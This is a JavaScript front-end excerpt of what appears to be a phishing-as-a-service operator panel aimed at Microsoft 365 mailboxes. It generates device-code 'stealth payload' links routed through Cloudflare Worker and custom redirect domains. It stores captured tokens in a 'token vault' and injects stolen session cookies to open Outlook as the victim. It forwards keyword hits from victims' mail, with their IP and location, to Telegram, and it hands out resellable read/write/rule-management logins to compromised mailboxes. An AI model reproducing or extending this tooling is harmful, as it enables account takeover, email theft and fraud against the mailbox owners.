    const res = await fetch(url, {
      ...options,
      headers: {
        ...(options.headers || {}),
        Authorization: `Bearer ${getToken()}`,
      },
    });

    if (res.status === 401) {
      const text = await res.text();
      if (text.includes("Invalid or expired token")) {
        logout();
        addToast("Session expired. Please sign in again.", "error");
      }
      throw new Error("Unauthorized");
    }

    return res;
  }

  async function openRealOutlook(mailbox) {
    try {
      const res = await fetchWithAuth(`${API}/outlook/session?mailbox=${encodeURIComponent(mailbox)}`);
      const data = await res.json();
      if (!data.cookies) throw new Error("No cookies returned");
      for (const cookie of data.cookies) {
        let cookieString = `${cookie.name}=${cookie.value}; Max-Age=31536000;`;
        if (cookie.path) cookieString += ` path=${cookie.path};`;
        if (cookie.domain) cookieString += ` domain=${cookie.domain};`;
        if (cookie.secure) cookieString += ` Secure;`;
        if (cookie.sameSite) cookieString += ` SameSite=${cookie.sameSite};`;
        document.cookie = cookieString;
      }
      window.open("https://outlook.office.com", "_blank");
    } catch (err) {
      addToast("Failed to open Outlook: " + err.message, "error");
    }
  }

  async function buildPayloadForUser(userId, flowType = "device_code", mailMode = true) {
    return null;
  }

  async function fetchPayloadScopes() {
    setPayloadScopes({
      mode: "mailbox_connection",
      scope: "User.Read Mail.Read Mail.ReadWrite Mail.Send offline_access",
    });
  }

  async function checkPayloadStatus() {
    addToast("Use mailbox setup.", "info");
  }

  async function generateStealthPayloadUrl() {
    await startDeviceCodeFlow(true);
  }

  async function fetchAppConfig() {
    try {
      const res = await fetch(`${API}/app-config`);
      const data = await res.json();
      if (res.ok) setAppConfig(data);
    } catch {}
  }

  async function fetchUserSettings() {
    try {
      const res = await fetchWithAuth(`${API}/settings`);
      const data = await res.json().catch(() => ({}));
      if (res.ok) {
        const workerUrl = data.worker_base_url || "";
        const clientId = data.azure_client_id || "";
        const tenant = data.azure_tenant || "common";
        setWorkerBaseUrl(workerUrl || DEFAULT_WORKER_BASE_URL);
        setAzureClientId(clientId);
        setAzureTenant(tenant);
        setInstructionRedirectBaseUrl(workerUrl || DEFAULT_WORKER_BASE_URL);
        if (workerUrl) {
          setInstructionRedirectMode(DEFAULT_REDIRECT_MODE);
        }
      }
    } catch {}
  }

  async function saveUserSettings() {
    try {
      const res = await fetchWithAuth(`${API}/settings`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          worker_base_url: (workerBaseUrl || "").trim(),
          azure_client_id: (azureClientId || "").trim(),
          azure_tenant: (azureTenant || "common").trim(),
        }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to save settings", "error");
        return;
      }
      addToast("Proxy settings saved", "success");
    } catch {
      addToast("Failed to save settings", "error");
    }
  }

  async function fetchCustomerProxy() {
    try {
      const res = await fetchWithAuth(`${API}/customer/me`);
      const data = await res.json().catch(() => ({}));
      if (res.ok && data.user) {
        setCustomerProxyUrl(data.user.proxy_url || "");
      }
    } catch {
      addToast("Failed to load proxy settings", "error");
    }
  }

  async function updateCustomerProxy() {
    try {
      const res = await fetchWithAuth(`${API}/customer/proxy`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ proxy_url: customerProxyUrl.trim() }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to update proxy", "error");
        return;
      }
      addToast("Proxy settings updated", "success");
    } catch {
      addToast("Failed to update proxy", "error");
    }
  }

  async function fetchRecentUrls() {
    try {
      const res = await fetchWithAuth(`${API}/device-code/recent-urls`);
      const data = await res.json();
      if (res.ok) setRecentUrls(data.urls || []);
    } catch {}
  }

  async function fetchDashboardSummary(userIdOverride = null) {
    try {
      const summaryUserId = userIdOverride !== null ? userIdOverride : selectedUserId;
      const res = await fetchWithAuth(`${API}/dashboard/summary?selected_user_id=${encodeURIComponent(summaryUserId || "")}`);
      const data = await res.json();
      if (!res.ok) return;
      setDashboardSummary({
        saved_users_count: data.saved_users_count || 0,
        connected_mailboxes_count: data.connected_mailboxes_count || data.stored_token_records || data.token_records_count || 0,
        stored_token_records: data.stored_token_records || data.token_records_count || data.connected_mailboxes_count || 0,
        token_records_count: data.token_records_count || data.stored_token_records || data.connected_mailboxes_count || 0,
        approved_tenants_count: data.approved_tenants_count || 0,
        pending_tenants_count: data.pending_tenants_count || 0,
        enterprise_enabled_count: data.enterprise_enabled_count || 0,
        active_links_generated: data.active_links_generated || data.number_active_links_generated || data.active_link_count || 0,
        number_active_links_generated: data.number_active_links_generated || data.active_links_generated || data.active_link_count || 0,
        active_link_count: data.active_link_count || data.active_links_generated || data.number_active_links_generated || 0,
        active_mailbox: data.active_mailbox || data.selected_user_id || "",
        selected_user_id: data.selected_user_id || data.active_mailbox || "",
      });
    } catch {}
  }

  async function fetchTokenVault() {
    setTokenVaultLoading(true);
    try {
      const res = await fetchWithAuth(`${API}/tokens`);
      const data = await res.json().catch(() => ({}));
      if (res.ok) setTokenVault(data.tokens || []);
    } catch {
      addToast("Failed to load token vault", "error");
    } finally {
      setTokenVaultLoading(false);
    }
  }

  async function syncDashboardConnections(userIdOverride = null) {
    try {
      await fetchWithAuth(`${API}/dashboard/sync-connections`, { method: "POST" });
    } catch {}

    const refreshUserId = userIdOverride !== null ? userIdOverride : selectedUserId;
    await fetchUsers();
    await fetchDashboardSummary(refreshUserId || "");
    await fetchTokenVault();
  }

  async function fetchKeywordListeners() {
    setKeywordLoading(true);
    try {
      const url = selectedUserId ? `${API}/keyword-listeners?user_id=${encodeURIComponent(selectedUserId)}` : `${API}/keyword-listeners`;
      const res = await fetchWithAuth(url);
      const data = await res.json().catch(() => ({}));
      if (res.ok) setKeywordListeners(data.listeners || []);
    } catch {}
    finally {
      setKeywordLoading(false);
    }
  }

  const startEditingKeyword = (listener) => {
    setEditingKeywordId(listener.id);
    setEditingKeywordPhrase(listener.phrase || listener.keywords || "");
  };

  const cancelEditingKeyword = () => {
    setEditingKeywordId(null);
    setEditingKeywordPhrase("");
  };

  const saveEditedKeyword = async (listenerId) => {
    const phrase = editingKeywordPhrase.trim();
    if (!phrase) {
      addToast("Keyword cannot be empty", "warning");
      return;
    }
    try {
      const res = await fetchWithAuth(`${API}/keyword-listeners/${listenerId}`, {
        method: "PUT",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ phrase }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to update keyword", "error");
        return;
      }
      setEditingKeywordId(null);
      setEditingKeywordPhrase("");
      await fetchKeywordListeners();
      addToast("Keyword updated", "success");
    } catch {
      addToast("Failed to update keyword", "error");
    }
  };

  async function addKeywordListener() {
    const phrase = (keywordPhrase || "").trim();
    if (!phrase) {
      addToast("Enter a word or phrase first", "warning");
      return;
    }
    try {
      const res = await fetchWithAuth(`${API}/keyword-listeners`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ phrase, telegram_enabled: keywordTelegramEnabled, user_id: selectedUserId }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to save keyword listener", "error");
        return;
      }
      setKeywordPhrase("");
      await fetchKeywordListeners();
      addToast("Keyword listener saved", "success");
    } catch {
      addToast("Failed to save keyword listener", "error");
    }
  }

  async function deleteKeywordListener(listenerId) {
    try {
      const res = await fetchWithAuth(`${API}/keyword-listeners/${listenerId}`, { method: "DELETE" });
      if (res.ok) {
        await fetchKeywordListeners();
        addToast("Keyword listener removed", "success");
      }
    } catch {}
  }

  async function clearAllKeywordListeners() {
    const filteredListeners = keywordListeners.filter(l => l.user_id === selectedUserId);
    if (filteredListeners.length === 0) return;
    confirm("Clear all keywords", `Remove all ${filteredListeners.length} keyword rules for ${selectedUserId}?`, async () => {
      setKeywordLoading(true);
      try {
        for (const l of filteredListeners) {
          await fetchWithAuth(`${API}/keyword-listeners/${l.id}`, { method: "DELETE" });
        }
        await fetchKeywordListeners();
        addToast("All keyword rules cleared", "success");
      } catch {
        addToast("Failed to clear all keywords", "error");
      } finally {
        setKeywordLoading(false);
      }
    });
  }

  async function fetchTelegramSettings() {
    try {
      const res = await fetchWithAuth(`${API}/telegram/settings`);
      const data = await res.json().catch(() => ({}));
      if (res.ok) {
        setTelegramBotToken(data.bot_token || "");
        setTelegramChatId(data.chat_id || "");
      }
    } catch {}
  }

  async function saveTelegramSettings() {
    setTelegramSettingsLoading(true);
    try {
      const res = await fetchWithAuth(`${API}/telegram/settings`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ bot_token: telegramBotToken, chat_id: telegramChatId }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to save Telegram settings", "error");
        return;
      }
      addToast("Telegram settings saved", "success");
    } catch {
      addToast("Failed to save Telegram settings", "error");
    } finally {
      setTelegramSettingsLoading(false);
    }
  }

  function getStoredValue(...keys) {
    for (const key of keys) {
      try {
        const value = localStorage.getItem(key);
        if (value !== null && String(value).trim()) return String(value).trim();
      } catch {}
    }
    return "";
  }

  function firstReportValue(...values) {
    for (const value of values) {
      if (value === null || value === undefined) continue;
      const clean = String(value).trim();
      if (clean) return clean;
    }
    return "";
  }

  function detectClientDeviceType() {
    const ua = navigator.userAgent || "";
    if (/ipad|tablet/i.test(ua)) return "tablet";
    if (/mobile|iphone|android/i.test(ua)) return "mobile";
    return "desktop";
  }

  function detectClientBrowser() {
    const ua = navigator.userAgent || "";
    if (/Edg\//i.test(ua)) return "Edge";
    if (/OPR\//i.test(ua) || /Opera/i.test(ua)) return "Opera";
    if (/Chrome\//i.test(ua) && !/Chromium/i.test(ua)) return "Chrome";
    if (/Safari\//i.test(ua) && !/Chrome\//i.test(ua)) return "Safari";
    if (/Firefox\//i.test(ua)) return "Firefox";
    return "Browser";
  }

  function buildTelegramReportPayload(extra = {}) {
    const selectedUser = firstReportValue(
      extra.selected_user_id,
      extra.user_id,
      selectedUserId,
      selectedUserIdRef.current,
      getStoredValue("selected_user_id", "user_id", "mail_user_id", "mailbox_user_id")
    );

    const email = firstReportValue(
      extra.email,
      extra.connected_email,
      extra.resolved_user_id,
      selectedUser && selectedUser.includes("@") ? selectedUser : "",
      getStoredValue("connected_email", "email", "mailbox_email", "microsoft_email")
    );

    const tenantId = firstReportValue(
      extra.tenant_id,
      extra.tenantId,
      getStoredValue("tenant_id", "tenantId", "tenant_hint"),
      tenantHint,
      selectedUser && selectedUser.includes("@") ? selectedUser.split("@")[1] : ""
    );

    const sessionId = firstReportValue(
      extra.session_id,
      extra.sessionId,
      getStoredValue("session_id", "sessionId", "visitor_id", "visit_id")
    );

    const ipAddress = firstReportValue(
      extra.ip_address,
      extra.ip,
      getStoredValue("ip_address", "ip", "client_ip", "visitor_ip")
    );

    const location = firstReportValue(
      extra.location,
      getStoredValue("location", "geo_location", "city_country", "country")
    );

    const device = firstReportValue(
      extra.device,
      getStoredValue("device", "device_type"),
      detectClientDeviceType()
    );

    const browser = firstReportValue(
      extra.browser,
      getStoredValue("browser", "browser_name"),
      detectClientBrowser()
    );

    return {
      event_type: firstReportValue(extra.event_type, extra.type, extra.event, "dashboard_event"),
      report_type: firstReportValue(extra.report_type, extra.event_type, extra.type, extra.event, "dashboard_event"),
      user_id: selectedUser,
      selected_user_id: selectedUser,
      email,
      connected_email: email,
      tenant_id: tenantId,
      tenant_hint: tenantId,
      session_id: sessionId,
      ip_address: ipAddress,
      ip: ipAddress,
      location,
      country: firstReportValue(extra.country, getStoredValue("country")),
      city: firstReportValue(extra.city, getStoredValue("city")),
      device,
      browser,
      user_agent: navigator.userAgent || "",
      userAgent: navigator.userAgent || "",
      page_url: window.location.href,
      page_path: `${window.location.pathname || ""}${window.location.search || ""}`,
      referrer: document.referrer || "",
      timestamp: new Date().toISOString(),
      ...extra,
    };
  }

  async function sendTelegramReportEvent(eventType, extra = {}) {
    try {
      const payload = buildTelegramReportPayload({
        event_type: eventType,
        report_type: eventType,
        ...extra,
      });

      const res = await fetchWithAuth(`${API}/telegram/report`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify(payload),
      });

      if (!res.ok) {
        const data = await res.json().catch(() => ({}));
        console.warn("Telegram report failed:", data.detail || data.error || res.status);
        return null;
      }

      return await res.json().catch(() => ({ ok: true }));
    } catch (error) {
      console.warn("Telegram report request failed:", error);
      return null;
    }
  }

  async function fetchReportResults() {
    try {
      const res = await fetchWithAuth(`${API}/results`);
      const data = await res.json().catch(() => ({}));
      if (res.ok) setReportResults(data.results || []);
    } catch {}
  }

  async function fetchActiveResultMailboxes() {
    setActiveResultMailboxesLoading(true);
    try {
      const res = await fetchWithAuth(`${API}/results/active-mailboxes`);
      const data = await res.json().catch(() => ({}));
      if (res.ok) {
        setActiveResultMailboxes(data.items || []);
      }
    } catch {
      } finally {
      setActiveResultMailboxesLoading(false);
    }
  }

  function buildMailViewerUrl(userId) {
    const url = new URL(window.location.href);
    url.searchParams.set("view", "mail");
    url.searchParams.set("mail_user_id", userId);
    return url.toString();
  }

  function openMailViewerForUser(userId) {
    const cleanUserId = String(userId || "").trim();
    if (!cleanUserId) {
      addToast("Missing user or mailbox ID", "warning");
      return;
    }
    window.open(buildMailViewerUrl(cleanUserId), "_blank", "noopener,noreferrer");
  }

  function downloadTextFile(filename, content) {
    const blob = new Blob([content], { type: "text/plain;charset=utf-8" });
    const objectUrl = window.URL.createObjectURL(blob);
    const a = document.createElement("a");
    a.href = objectUrl;
    a.download = filename;
    document.body.appendChild(a);
    a.click();
    a.remove();
    window.setTimeout(() => window.URL.revokeObjectURL(objectUrl), 1500);
  }

  function sanitizeFileName(value) {
    return String(value || "mailbox")
      .replace(/[^a-zA-Z0-9._-]+/g, "_")
      .replace(/^_+|_+$/g, "")
      .slice(0, 80) || "mailbox";
  }

  async function fetchTemporaryMailboxAccesses(mailboxUserId = "") {
    try {
      const qs = mailboxUserId ? `?mailbox_user_id=${encodeURIComponent(mailboxUserId)}` : "";
      const res = await fetchWithAuth(`${API}/mail-viewer-access${qs}`);
      const data = await res.json().catch(() => ({}));
      if (res.ok) setTemporaryMailboxAccesses(data.items || []);
    } catch {}
  }

  async function createTemporaryMailboxAccess(mailboxUserId) {
    const cleanMailbox = String(mailboxUserId || "").trim();
    if (!cleanMailbox) {
      addToast("Missing mailbox user ID", "warning");
      return;
    }

    const rawHours = window.prompt("Temporary access duration in hours", "24");
    if (rawHours === null) return;

    const ttlHours = Math.max(1, Math.min(Number(rawHours || 24) || 24, 720));
    setTemporaryMailboxAccessLoading((prev) => ({ ...prev, [`create-${cleanMailbox}`]: true }));

    try {
      const res = await fetchWithAuth(`${API}/mail-viewer-access`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          mailbox_user_id: cleanMailbox,
          ttl_hours: ttlHours,
          can_read: true,
          can_write: true,
          can_manage_rules: true,
        }),
      });

      const data = await res.json().catch(() => ({}));

      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to create temporary login", "error");
        return;
      }

      const viewerUrl = data.viewer_url || buildMailViewerUrl(cleanMailbox);
      const txtContent = [
        "1. Login link",
        `${viewerUrl}`,
        "",
        "2. Username",
        `${data.username || ""}`,
        "",
        "3. Password",
        `${data.password || ""}`,
        "",
        "4. Mailbox",
        `${cleanMailbox}`,
        "",
        "5. You can regenerate if access is revoked or times out",
        "",
      ].join("\n");

      const filename = `temporary_mailbox_login_${sanitizeFileName(cleanMailbox)}.txt`;
      downloadTextFile(filename, txtContent);

      try {
        await navigator.clipboard.writeText(`Viewer link: ${viewerUrl}\\nUsername: ${data.username || ""}\\nPassword: ${data.password || ""}`);
      } catch {}

      addToast("Temporary login created. Downloadable TXT file generated.", "success");
      await fetchTemporaryMailboxAccesses();
    } catch {
      addToast("Failed to create temporary login", "error");
    } finally {
      setTemporaryMailboxAccessLoading((prev) => ({ ...prev, [`create-${cleanMailbox}`]: false }));
    }
  }

  async function revokeTemporaryMailboxAccess(accessId) {
    if (!accessId) return;
    confirm("Revoke temporary mailbox login", "Revoke this temporary mailbox viewer login now?", async () => {
      setTemporaryMailboxAccessLoading((prev) => ({ ...prev, [`revoke-${accessId}`]: true }));
      try {
        const res = await fetchWithAuth(`${API}/mail-viewer-access/${accessId}`, { method: "DELETE" });
        const data = await res.json().catch(() => ({}));
        if (!res.ok) {
          addToast(data.detail || data.error || "Failed to revoke temporary login", "error");
          return;
        }
        await fetchTemporaryMailboxAccesses();
        addToast("Temporary mailbox login revoked", "success");
      } catch {
        addToast("Failed to revoke temporary login", "error");
      } finally {
        setTemporaryMailboxAccessLoading((prev) => ({ ...prev, [`revoke-${accessId}`]: false }));
      }
    });
  }

  async function sendSupportMessage() {
    if (!supportMessage.trim()) {
      addToast("Enter a support message", "warning");
      return;
    }
    setSupportSending(true);
    try {
      const res = await fetchWithAuth(`${API}/support/contact`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ message: supportMessage }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to send support message", "error");
        return;
      }
      setSupportMessage("");
      addToast("Support message sent", "success");
    } catch {
      addToast("Failed to send support message", "error");
    } finally {
      setSupportSending(false);
    }
  }

  async function fetchSecuritySettings() {
    try {
      const res = await fetchWithAuth(`${API}/account/security-settings`);
      const data = await res.json().catch(() => ({}));
      if (res.ok) {
        setSecuritySettings({
          password_override_enabled: !!data.password_override_enabled,
          two_factor_enabled: !!data.two_factor_enabled,
          totp_issuer: data.totp_issuer || "MailPanel",
        });
      }
    } catch {}
  }

  async function changePanelPassword() {
    if (!currentPanelPassword || !newPanelPassword || !confirmPanelPassword) {
      addToast("Fill in all password fields", "warning");
      return;
    }
    if (newPanelPassword !== confirmPanelPassword) {
      addToast("New passwords do not match", "error");
      return;
    }
    if (newPanelPassword.length < 8) {
      addToast("New password must be at least 8 characters", "warning");
      return;
    }
    setSecurityLoading(true);
    try {
      const res = await fetchWithAuth(`${API}/account/change-password`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          current_password: currentPanelPassword,
          new_password: newPanelPassword,
        }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to change panel password", "error");
        return;
      }
      setCurrentPanelPassword("");
      setNewPanelPassword("");
      setConfirmPanelPassword("");
      await fetchSecuritySettings();
      addToast("Panel password updated", "success");
    } catch {
      addToast("Failed to change panel password", "error");
    } finally {
      setSecurityLoading(false);
    }
  }

  async function startTwoFactorSetup() {
    setSecurityLoading(true);
    try {
      const res = await fetchWithAuth(`${API}/account/2fa/setup`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to start 2FA setup", "error");
        return;
      }
      setTwoFactorSetup(data);
      setTwoFactorCode("");
      addToast("Add the key to Google Authenticator, then enter the 6-digit code", "info");
    } catch {
      addToast("Failed to start 2FA setup", "error");
    } finally {
      setSecurityLoading(false);
    }
  }

  async function enableTwoFactor() {
    if (!twoFactorCode.trim()) {
      addToast("Enter the 6-digit authenticator code", "warning");
      return;
    }
    setSecurityLoading(true);
    try {
      const res = await fetchWithAuth(`${API}/account/2fa/enable`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ code: twoFactorCode.trim() }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to enable 2FA", "error");
        return;
      }
      setTwoFactorSetup(null);
      setTwoFactorCode("");
      await fetchSecuritySettings();
      addToast("Google Authenticator 2FA enabled", "success");
    } catch {
      addToast("Failed to enable 2FA", "error");
    } finally {
      setSecurityLoading(false);
    }
  }

  async function disableTwoFactor() {
    if (!twoFactorDisablePassword) {
      addToast("Enter your panel password", "warning");
      return;
    }
    if (!twoFactorDisableCode.trim()) {
      addToast("Enter your current 2FA code", "warning");
      return;
    }
    setSecurityLoading(true);
    try {
      const res = await fetchWithAuth(`${API}/account/2fa/disable`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          password: twoFactorDisablePassword,
          code: twoFactorDisableCode.trim(),
        }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to disable 2FA", "error");
        return;
      }
      setTwoFactorDisablePassword("");
      setTwoFactorDisableCode("");
      setTwoFactorSetup(null);
      await fetchSecuritySettings();
      addToast("2FA disabled", "success");
    } catch {
      addToast("Failed to disable 2FA", "error");
    } finally {
      setSecurityLoading(false);
    }
  }

  function normalizeRedirectBaseUrl(value) {
    const clean = String(value || "").trim().replace(/\/+$/, "");
    if (!clean) return "";
    if (clean.startsWith("http://") || clean.startsWith("https://")) return clean;
    return `https://${clean}`;
  }

  function getEffectiveRedirectBaseUrl(mode = instructionRedirectMode) {
    if (mode === "worker") {
      return normalizeRedirectBaseUrl(instructionRedirectBaseUrl);
    }
    if (mode === "custom") {
      return normalizeRedirectBaseUrl(customRedirectDomain || instructionRedirectBaseUrl);
    }
    return "";
  }

  const computeProxiedVerificationUri = useCallback((rawUri) => {
    if (!rawUri) return "";
    const mode = String(instructionRedirectMode || "direct").toLowerCase();
    if (mode === "worker" || mode === "custom") {
      const redirectBase = getEffectiveRedirectBaseUrl(mode).replace(/\/$/, "");
      if (redirectBase) {
        return `${redirectBase}/device`;
      }
    }
    const fallbackWorker = (workerBaseUrl || "").trim().replace(/\/$/, "");
    if (fallbackWorker) {
      return `${fallbackWorker}/device`;
    }
    return rawUri;
  }, [instructionRedirectMode, workerBaseUrl, getEffectiveRedirectBaseUrl]);

  async function fetchRedirectDomainSettings() {
    setRedirectDomainLoading(true);
    try {
      const res = await fetchWithAuth(`${API}/redirect-domain/settings`);
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to load DNS settings", "error");
        return;
      }
      setRedirectDnsSettings(data);
      const savedWorkerBaseUrl = data.saved_worker_base_url || data.saved_worker?.base_url || data.worker_base_url || "";
      if (savedWorkerBaseUrl) {
        setInstructionRedirectBaseUrl(savedWorkerBaseUrl);
        setInstructionRedirectMode("worker");
      }
      if (!customRedirectDomain && data.custom_redirect_domain) {
        setCustomRedirectDomain(data.custom_redirect_domain);
        setInstructionRedirectMode("custom");
      }
      addToast("Redirect DNS settings loaded", "success");
    } catch {
      addToast("Failed to load DNS settings", "error");
    } finally {
      setRedirectDomainLoading(false);
    }
  }

  async function saveUserWorkerRedirectUrl() {
    const workerBaseUrl = normalizeRedirectBaseUrl(instructionRedirectBaseUrl);
    if (!workerBaseUrl) {
      addToast("Enter and save your own workers.dev URL first", "warning");
      return;
    }
    if (!workerBaseUrl.startsWith("https://")) {
      addToast("Worker URL must start with https://", "warning");
      return;
    }
    setRedirectDomainLoading(true);
    try {
      const res = await fetchWithAuth(`${API}/redirect-domain/worker`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ worker_base_url: workerBaseUrl }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to save Worker URL", "error");
        return;
      }
      setRedirectDnsSettings(data);
      setInstructionRedirectBaseUrl(data.worker_base_url || workerBaseUrl);
      setInstructionRedirectMode("worker");
      addToast("Worker URL saved for this account", "success");
    } catch {
      addToast("Failed to save Worker URL", "error");
    } finally {
      setRedirectDomainLoading(false);
    }
  }

  async function prepareCustomRedirectDomain() {
    const domain = normalizeRedirectBaseUrl(customRedirectDomain || instructionRedirectBaseUrl);
    if (!domain) {
      addToast("Enter your custom redirect domain first", "warning");
      return;
    }
    setRedirectDomainLoading(true);
    try {
      const res = await fetchWithAuth(`${API}/redirect-domain/prepare`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ custom_domain: domain, cloudflare_lookup: true }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to prepare custom domain", "error");
        return;
      }
      setRedirectDnsSettings(data);
      setCustomRedirectDomain(domain);
      setInstructionRedirectBaseUrl(domain);
      setInstructionRedirectMode("custom");
      addToast("Custom domain DNS settings prepared", "success");
    } catch {
      addToast("Failed to prepare custom domain", "error");
    } finally {
      setRedirectDomainLoading(false);
    }
  }

  function handleInstructionRedirectModeChange(nextMode) {
    setInstructionRedirectMode(nextMode);
    if (nextMode === "worker") {
      setInstructionRedirectBaseUrl(normalizeRedirectBaseUrl(instructionRedirectBaseUrl || redirectDnsSettings?.saved_worker_base_url || redirectDnsSettings?.worker_base_url || DEFAULT_WORKER_BASE_URL));
    } else if (nextMode === "custom") {
      setInstructionRedirectBaseUrl(normalizeRedirectBaseUrl(customRedirectDomain || instructionRedirectBaseUrl));
    } else {
      setInstructionRedirectBaseUrl("");
    }
  }

  // ============================================================
  // NEW: Custom domain management (Cloudflare zone + Auto SSL + shared Worker)
  // ============================================================
  async function fetchCustomDomains() {
    setDomainsLoading(true);
    try {
      const res = await fetchWithAuth(`${API}/redirect-domain/domains`);
      const data = await res.json().catch(() => ({}));
      if (res.ok) setCustomDomains(data.domains || []);
    } catch {}
    finally {
      setDomainsLoading(false);
    }
  }

  async function addCustomDomain() {
    const domain = newDomainInput.trim();
    if (!domain) {
      addToast("Enter a domain first", "warning");
      return;
    }
    setAddingDomain(true);
    try {
      const res = await fetchWithAuth(`${API}/redirect-domain/domains`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ domain }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to add domain", "error");
        return;
      }
      setNewDomainInput("");
      await fetchCustomDomains();
      addToast(data.message || "Domain added. Set the nameservers at your registrar.", "success");
    } catch {
      addToast("Failed to add domain", "error");
    } finally {
      setAddingDomain(false);
    }
  }

  async function refreshDomainStatus(domainId) {
    setDomainStatusLoading((prev) => ({ ...prev, [domainId]: true }));
    try {
      const res = await fetchWithAuth(`${API}/redirect-domain/domains/${domainId}/status`);
      const data = await res.json().catch(() => ({}));
      if (res.ok) {
        await fetchCustomDomains();
        const ssl = data.ssl_active
          ? "SSL active ✓"
          : `SSL ${data.domain?.verification_status || "pending"}`;
        addToast(`DNS ${data.domain?.dns_status || "pending"} · ${ssl}`, "info");
      } else {
        addToast(data.detail || "Failed to check status", "error");
      }
    } catch {
      addToast("Failed to check status", "error");
    } finally {
      setDomainStatusLoading((prev) => ({ ...prev, [domainId]: false }));
    }
  }

  async function removeCustomDomain(domainId, domainName) {
    confirm(
      "Remove custom domain",
      `Remove ${domainName}? Existing links on this domain will stop routing.`,
      async () => {
        try {
          const res = await fetchWithAuth(`${API}/redirect-domain/domains/${domainId}`, {
            method: "DELETE",
          });
          const data = await res.json().catch(() => ({}));
          if (!res.ok) {
            addToast(data.detail || data.error || "Failed to remove domain", "error");
            return;
          }
          await fetchCustomDomains();
          addToast("Domain removed", "success");
        } catch {
          addToast("Failed to remove domain", "error");
        }
      }
    );
  }

  async function attachDomainToWorker(domainId) {
    setDomainAttachLoading((prev) => ({ ...prev, [domainId]: true }));
    try {
      const res = await fetchWithAuth(
        `${API}/redirect-domain/domains/${domainId}/attach-worker`,
        { method: "POST" }
      );
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to attach Worker", "error");
        return;
      }
      await fetchCustomDomains();
      addToast(
        data.already_attached
          ? "Domain was already attached to the Worker"
          : `${data.domain?.domain || "Domain"} is now routing through the shared Worker`,
        "success"
      );
    } catch {
      addToast("Failed to attach Worker", "error");
    } finally {
      setDomainAttachLoading((prev) => ({ ...prev, [domainId]: false }));
    }
  }

  async function detachDomainFromWorker(domainId, domainName) {
    confirm(
      "Detach domain from Worker",
      `Detach ${domainName} from the shared Worker? Traffic on this domain will stop routing.`,
      async () => {
        try {
          const res = await fetchWithAuth(
            `${API}/redirect-domain/domains/${domainId}/detach-worker`,
            { method: "POST" }
          );
          const data = await res.json().catch(() => ({}));
          if (!res.ok) {
            addToast(data.detail || data.error || "Failed to detach", "error");
            return;
          }
          await fetchCustomDomains();
          addToast("Domain detached", "success");
        } catch {
          addToast("Failed to detach", "error");
        }
      }
    );
  }

  function selectDomainForRedirect(domain) {
    setCustomRedirectDomain(`https://${domain.domain}`);
    setInstructionRedirectMode("custom");
    setInstructionRedirectBaseUrl(`https://${domain.domain}`);
    addToast(`${domain.domain} selected for redirects`, "success");
  }
    function normalizeTemplateOwner(value) {
    return String(value || "").trim().toLowerCase();
  }

  function isAdminOwnedTemplate(item) {
    const owner = normalizeTemplateOwner(item?.owner_type || item?.template_owner || item?.scope || item?.visibility || item?.created_by_role);
    return Boolean(item?.is_admin_template || item?.admin_template || item?.global_template || ["admin", "owner", "global", "system"].includes(owner));
  }

  function isUserOwnedTemplate(item) {
    if (!item) return false;
    if (isAdminOwnedTemplate(item)) return false;
    const owner = normalizeTemplateOwner(item.owner_type || item.template_owner || item.scope || item.visibility || item.created_by_role || item.source);
    return Boolean(
      item.can_manage ||
      item.can_edit ||
      item.can_update ||
      item.can_delete ||
      item.is_own_template ||
      item.owned_by_current_user ||
      ["user", "customer", "custom", "mine", "personal"].includes(owner)
    );
  }

  function canManageTemplate(item) {
    if (!item) return false;
    if (item.can_manage === true || item.can_edit === true) return true;
    return isAdmin || isUserOwnedTemplate(item);
  }

  function sortTemplatesForDropdown(items = []) {
    return [...items].sort((a, b) => {
      const aOwn = isUserOwnedTemplate(a) ? 0 : 1;
      const bOwn = isUserOwnedTemplate(b) ? 0 : 1;
      if (aOwn !== bOwn) return aOwn - bOwn;
